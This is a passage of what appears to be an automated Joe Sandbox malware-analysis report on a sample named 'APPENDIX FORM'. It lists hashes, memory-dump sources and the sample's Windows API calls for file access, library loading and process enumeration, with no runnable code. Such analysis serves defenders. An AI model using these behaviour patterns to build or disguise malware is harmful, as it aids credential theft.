                                                                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: BINARY
                                                                                                              • API String ID: 2221118986-907554435
                                                                                                              • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                              • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp
                                                                                                              • String ID: /stext
                                                                                                              • API String ID: 2081463915-3817206916
                                                                                                              • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                              • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                              APIs
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2445788494-0
                                                                                                              • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                              • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: malloc
                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                              • API String ID: 2803490479-1168259600
                                                                                                              • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                              • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                              • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                              • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0041BDDF
                                                                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmpmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1065087418-0
                                                                                                              • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                              • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                              • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1381354015-0
                                                                                                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004301AD
                                                                                                              • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1297977491-0
                                                                                                              • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                              • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1294909896-0
                                                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                              APIs
                                                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2154303073-0
                                                                                                              • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                              • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                              APIs
                                                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3150196962-0
                                                                                                              • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                              • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                              APIs
                                                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$PointerRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 3154509469-0
                                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                              APIs
                                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4232544981-0
                                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                              APIs
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$FileModuleName
                                                                                                              • String ID:
                                                                                                              • API String ID: 3859505661-0
                                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                              APIs
                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
APIs
• FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
